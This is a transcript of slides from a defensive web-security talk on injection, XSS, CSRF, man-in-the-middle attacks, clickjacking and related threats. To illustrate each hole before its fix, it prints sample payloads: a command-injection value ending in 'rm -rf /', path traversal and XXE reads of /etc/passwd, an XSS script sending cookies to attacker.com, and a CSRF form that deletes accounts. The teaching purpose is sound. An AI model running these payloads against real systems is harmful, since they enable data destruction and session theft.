Vorausschauende Sicherheits-Architektur

Transcript

1. @BastianHofmann Proactive Web Security Bastian Hofmann

2. Thinking about Security is important

3. • 2013/14 • 3 billion user accounts

4. • 2016 • 145 million user accounts

5. • 2016 • 412 million user accounts

6. • 2017 • Personal Information of
 143 million consumers

7. • 2011 • 77 million user accounts
 $171 million loss

8. …

9. Everyone is a target for attackers

10. So let’s think about the harmful things a hacker can

    do

11. And what we can do to prevent them

12. Disclaimer

13. None of these lists are ever complete

14. Stay up-to-date

15. None

16. Try to get access to the database

17. $ mongo yoursite.com

18. Use authentication and TLS

19. Do not expose your databases to the internet

20. “There are nearly 30,000 [MongoDB] instances on the Internet that

    don't have any authorization enabled” https://blog.shodan.io/its-the-data-stupid/

21. Scan your public IPs for open ports

22. nmap

23. $ nmap scanme.nmap.org Starting Nmap 7.60 … Not shown: 994

    closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 9929/tcp open nping-echo

24. $ nmap www.researchgate.net Starting Nmap 7.60 … PORT STATE SERVICE

    80/tcp open http 443/tcp open https

25. These are still two open ports

26. Attack vector

27. Bugs in your software

28. Injections

29. SQL Injection

30. <?php $userId = $_GET[‘userId’]; $sql = ‘SELECT * FROM users

    WHERE id =‘ . $userId; $mysqli->query($sql);

31. <?php // 12 OR TRUE $userId = $_GET[‘userId’]; $sql =

    ‘SELECT * FROM users WHERE id =‘ . $userId; $mysqli->query($sql);

32. Escape

33. <?php $name = $_GET[‘name’]; $name = $mysqli->real_escape_string($name); $sql = ‘SELECT

    * FROM users WHERE name = ’ . $name; $mysqli->query($sql);

34. Use an ORM

35. http://www.doctrine- project.org/projects/ orm.html

36. <?php $userId = (int) $_GET[‘userId’]; $user = $entityManager->find( ‘User’, $userId

    );

37. Use prepared statements

38. <?php $userId = (int) $_GET[‘userId’]; $rsm = new ResultSetMapping(); $query

    = $entityManager->createNativeQuery( 'SELECT * FROM users WHERE userId = ?', $rsm ); $query->setParameter(1, $userId); $users = $query->getResult();

39. There are more types of injections

40. Injection in HTTP requests

41. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', 'https://api.com/path/?id='

    . $_GET[‘id'] );

42. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', //

    6&admin=true 'https://api.com/path/?id=' . $_GET[‘id'] );

43. Always escape

44. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', 'https://api.com/path/?id='

    . urlencode($_GET[‘id’]) );

45. Use sensible libraries

46. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', 'https://api.com/path/',

    ['query' => ['id' => $_GET['id']]] );

47. Command injection

48. <?php $logFile = $_GET['logFile']; passthru( 'cat ' . __DIR__ .

    '/' . $logFile );

49. <?php // foo.log && rm -rf / $logFile = $_GET['logFile'];

    passthru( 'cat ' . __DIR__ . '/' . $logFile );

50. Always escape

51. <?php $logFile = $_GET['logFile']; passthru( 'cat ' . escapeshellarg( __DIR__

    . '/' . $logFile ) );

52. Path traversals

53. <?php // ../../../etc/passwd $logFile = $_GET['logFile']; passthru( 'cat ' .

    escapeshellarg( __DIR__ . '/' . $logFile ) );

54. Validation

55. <?php $logFile = $_GET['logFile']; if (!preg_match('/^[a-z]+\.log$/', $logFile) { throw new

    \Exception('Invalid file name'); } passthru( 'cat ' . escapeshellarg( __DIR__ . '/' . $logFile ) );

56. <?php $logFile = $_GET['logFile']; $file = realpath(__DIR__ . '/' .

    $logFile); if (dirname($file) !== __DIR__) { throw \Exception('Invalid file'); } passthru( 'cat ' . escapeshellarg( $file ) );

57. Code injection

58. <?php $myvar = "varname"; $x = $_GET['arg']; eval("\$myvar = \$x;");

59. Do not use eval or create_function

60. XML Entity Injection

61. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY >

    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

62. Disable entity loading

63. <?php // set this very early in your request libxml_disable_entity_loader(true);

64. Only enable it, if you really need it

65. Trusted SOAP APIs over TLS

66. <?php function dangerouslyEnableXmlEntityLoader( callable $f ) { try { libxml_disable_entity_loader(false);

    return $f(); } finally { libxml_disable_entity_loader(true); } }

67. Use static code analysis, e.g. with PHP_CodeSniffer

68. If the attacker can’t find any injection vulnerabilities

69. Trying to find bugs in libraries you use

70. Keep things up to date

71. Check for known security vulnerabilities

72. None

73. https://github.com/ sensiolabs/security- checker

74. $ php security-checker security:check ./composer.lock Symfony Security Check Report =============================

    [OK] No packages have known vulnerabilities.
75. None

76. https://github.com/ nodesecurity/nsp

77. $ nsp check --reporter summary (+) No known vulnerabilities found

78. Trying to find bugs in your infrastructure

79. Web-Server

80. PHP

81. OS

82. …

83. Keep things up to date

84. Scan for known vulnerabilities

85. https://github.com/ future-architect/vuls

86. localhost (centos7.3.1611) ========================== Total: 109 (High:35 Medium:55 Low:16 ?:3) 31

    updatable packages CVE-2015-2806 10.0 HIGH (nvd) Stack-based buffer overflow in asn1_der_decoding in libtasn1 before 4.4 allows remote attackers to have unspecified impact via unknown vectors.

87. If there are no vulnerabilities so far

88. Try to take over accounts

89. Man-in-the-middle attacks

90. HTTP is plain text

91. Very easy to read and modify on the wire

92. Public WiFis

93. $ sudo tcpdump -v port 80

94. $ curl http://google.com

95. 14:06:40.337900 IP6 (flowlabel 0xbb911, hlim 57, next- header TCP (6)

    payload length: 549) muc11s14-in-x0e. 1e100.net.http > 2a02:8109:9880:2e9c:94b4:a371:f1b3:b82b. 60808: Flags [P.], cksum 0x4ae9 (correct), seq 1:518, ack 75, win 106, options [nop,nop,TS val 2632812618 ecr 335746159], length 517: HTTP, length: 517 HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Location: http://www.google.de/? gfe_rd=cr&dcr=0&ei=4LJYWo6FFKiF8Qe9w63gAQ Content-Length: 268 Date: Fri, 12 Jan 2018 13:06:40 GMT

96. Encrypt the traffic

97. TLS

98. But “TLS is slow and expensive”

99. https://letsencrypt.org/

100. https://istlsfastyet.com/

101. Check config

102. https:// www.ssllabs.com/ ssltest

103. None

104. What happens when you enter a URL into the address

     bar?
105. None

106. $ curl -I http://www.researchgate.net HTTP/1.1 301 Moved Permanently Content-Length: 178

     Content-Type: text/html Date: Fri, 12 Jan 2018 13:02:35 GMT Location: https://www.researchgate.net/ Server: nginx Connection: keep-alive

107. Man-in-the-Middle Attack on initial redirect

108. Strict-Transport-Security https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/S

109. strict-transport-security: max-age=15552000; includeSubDomains; preload

110. chrome://net-internals/ #hsts

111. Man-in-the-Middle Attack on the very first time the user visits

     a site

112. Browser Preloads

113. strict-transport-security: max-age=15552000; includeSubDomains; preload

114. https://hstspreload.org/

115. So no man-in-the middle

116. Brute force to guess the session id

117. Session ID should be long enough

118. https://secure.php.net/ manual/en/ session.configuration.p hp#ini.session.hash- function

119. Brute force to guess the password

120. Ratelimits

121. Captchas

122. None

123. Log logins

124. Remote logout

125. None

126. Alert user of logins on a new device

127. None

128. Two-Factor-Authentication

129. “Less then 10 percent of all google users use Two-Factor-

     Authentication” http://uk.pcmag.com/news/92919/most-google-accounts-dont-use-two-factor- authentication

130. E-Mail only logins

131. None
132. None
133. None
134. None
135. None

136. Works great on mobile where entering a password is tedious

137. Getting into the accounts directly is not possible or very

     expensive

138. Doing actions on the user’s behalf without direct account takeover

139. Cross Site Request Forgery

140. http://site.com/ deleteCurrentAccount

141. Session cookie is necessary for the request to work

142. On the site of an attacker

143. <img src=“http://site.com/deleteCurrentAccount" />

144. The browser automatically adds the session cookie when the image

     is fetched

145. Or an email with “Hey click on http://bit.ly/2n1b42n to win”

146. Don’t support GET requests for writing operations

147. Though that does not help

148. On the site of an attacker

149. <form method="POST" id="form" action="http://site.com/deleteCurrentAccount"> </form> <script> document.getElementById("form") .submit() </script>

150. CSRF tokens

151. Create token that has the Session ID cookie value encrypted

152. <?php $plaintext = $sessionId . '/' . $userId . '/'

     . time(); $nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES); $token = base64_encode($nonce . sodium_crypto_secretbox($plaintext, $nonce, $key));

153. Add this token to every non GET request

154. <form method="POST" id="form" action=“http://site.com/deleteCurrentAccount"> <input type="hidden" name="csrf_token" value="<?php echo $token

     ?>" /> </form>

155. Same for XHR requests

156. Verify that the content of the token matches the session

     from the cookie

157. <?php $token = $_POST['csrf_token']; $nonce = substr( $token, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES

     ); $crypt = substr( $token, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES ); $plaintext = sodium_crypto_secretbox_open($crypt, $nonce, $key); [$sessionId, $userId, $time] = explode('/', $plaintext); // …

158. if ( $sessionId !== session_id() || $userId !== $_SESSION['userId'] ||

     time() - $time > 7200 ) { throw \Exception('Invalid csrf token'); }

159. Because of the Cross Origin Policy an attacker can not

     get hold of a matching CSRF token

160. Libraries / Frameworks

161. https://symfony.com/ doc/current/security/ csrf.html

162. Same Site Cookies

163. Browser only sends cookie in a “first-party-context”

164. http:// www.sjoerdlangkemper. nl/2016/04/14/ preventing-csrf-with- samesite-cookie- attribute/

165. Set-Cookie: sessionid=...; Secure; HttpOnly; SameSite=strict

166. https://wiki.php.net/rfc/ same-site-cookie

167. https://caniuse.com/ #feat=same-site-cookie- attribute

168. None

169. But there are other ways to do something on behalf

     of the user

170. XSS Injection

171. <html> <body> <div> User generated comment that comes from database

     </div> </body> </html>

172. <html> <body> <div> <?php echo $comment; ?> </div> </body> </html>

173. <html> <body> <div> User generated comment <script> fetch( 'http://attacker.com/?cookies=' +

     document.cookie ) </script> that comes from database </div> </body> </html>

174. Escape content

175. <html> <body> <div> <?php echo htmlspecialchars($comment); ?> </div> </body> </html>

176. Template libraries

177. https:// twig.symfony.com/

178. {% autoescape "html" %} <html> <body> <div> {{ comment }}

     </div> </body> </html> {% endautoescape %}

179. https:// mustache.github.io/

180. <html> <body> <div> {{comment}} </div> </body> </html>

181. Frontend frameworks

182. https://reactjs.org/

183. What if you want to allow certain HTML tags

184. Formatting, Links, Paragraphes, …

185. HTML Purifier

186. http://htmlpurifier.org/

187. $config = HTMLPurifier_Config::createDefault(); $purifier = new HTMLPurifier($config); $cleanHtml = $purifier->purify($dirtyHtml);

188. It’s easy to make errors

189. Try to limit the impact

190. HTTPS only Cookies

191. Set-Cookie: sessionid=...; Secure; HttpOnly

192. $expire = 0; $path = ''; $domain = ''; $secure

     = true; $httpOnly = true; setcookie( 'sessionId', '...', $expire, $path, $domain, $secure, $httpOnly );

193. Content Security Policy

194. https:// developer.mozilla.org/ en-US/docs/Web/HTTP/ CSP

195. Content-Security-Policy: default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'; style-src

     'self';
196. None

197. Reporting

198. Content-Security-Policy: default-src … report-uri / csp_errors;

199. Do not allow inline script tags

200. But if you must

201. CSP Nonces

202. Content-Security-Policy: script-src 'nonce-2726c7f26c'

203. <script nonce="2726c7f26c">...</script>

204. No XSS vulnerabilities

205. Trying to trick user into providing sensitive information

206. Phishing

207. Mostly hard to prevent because it is out of your

     control

208. But some attack vectors are preventable

209. Clickjacking

210. None
211. None

212. <html> <body> <iframe src="https://www.researchgate.net/login"> </iframe> <script> ... </script> </body> </html>

213. No direct access to page in IFRAME possible

214. Invisible input boxes overlaying the IFRAME
 to capture input

215. Forbid displaying your page in an IFRAME

216. X-Frame-Options: SAMEORIGIN

217. Tabnabbing

218. <a href="http://external.page" target="_blank"> Link </a>

219. Common for linking URLs in user provided content

220. In the opened window

221. <script> if (window.opener) { opener.location = 'http://phishing-site.com'; } </script>

222. Prevention

223. <a href="http://external.page" target="_blank" rel="noopener"> Link </a>

224. https:// mathiasbynens.github.i o/rel-noopener/

225. So that was a lot of information

226. Let’s sum it up

227. The internet is a scary place

228. If you have users you’re a target

229. Stay alert

230. Invest into good security practices

231. There is always more

232. Stay up to date

233. http://speakerdeck.com/ u/bastianhofmann

234. [email protected] https://twitter.com/BastianHofmann

235. Resources • https://www.owasp.org • https://twitter.com/miss_jwo/status/957555207868690434

236. Backup slides

237. Speaking of URL’s in user generated content

238. Spot the difference

239. researchgate.net/login rеsearchgate.net/login

240. researchgate.net/login rеsearchgate.net/login This is a cyrillic “e”

241. International domain names

242. https://en.wikipedia.org/ wiki/ IDN_homograph_attack

243. Warn the user before browsing to a IDN URL

244. None

245. Warn on misspellings

246. reserchgate.net/login

247. researchgate.tv/login

248. researchgate.education/login

249. researchgate.attacker.com/login

250. Follow redirects

251. http://bit.ly/1bdDlXc

252. None

253. Still HTML/XSS injection vulnerabilities are bad

254. Try to detect them

255. In your template library

256. https:// mustache.github.io/

257. Every time something gets escaped, also replace “e” with an

     escape sequence

258. Before returning the resulting HTML

259. Check if there are any “e” characters left

260. If yes, log this as a potential XSS vulnerability

261. Replace the escape sequence back to “e”

262. <div class="some-name"> {{firstName}} {{{lastName}}} </div>

263. firstName: Peter lastName: Parker

264. <div class="som___101___-nam___101___"> P___101___t___101___r Parker </div>

265. <div class="som___101___-nam___101___"> P___101___t___101___r Parker </div>

266. Self XSS

267. “Hey open the developer tools and paste this code there

     to get special features”

268. Add console warning

269. None

270. <script> if ( typeof console === 'object' && console.log )

     { console.log( '%cWARNING!', 'color:white; background:red;' ); ... } </script>

271. Check for internal IPs

272. None

273. With everything you do

274. Log and monitor sensitive operations

275. Alerts on suspicious behaviour

276. Web Application Firewalls

277. Ability to quickly block traffic patterns

278. Linking URLs in user generated content

279. Information disclosure through Referrer

280. https:// developer.mozilla.org/ en-US/docs/Web/HTTP/ Headers/Referer

281. Referrer Policy

282. Referrer-Policy: origin-when-cross-origin

283. https:// developer.mozilla.org/ en-US/docs/Web/HTTP/ Headers/Referrer-Policy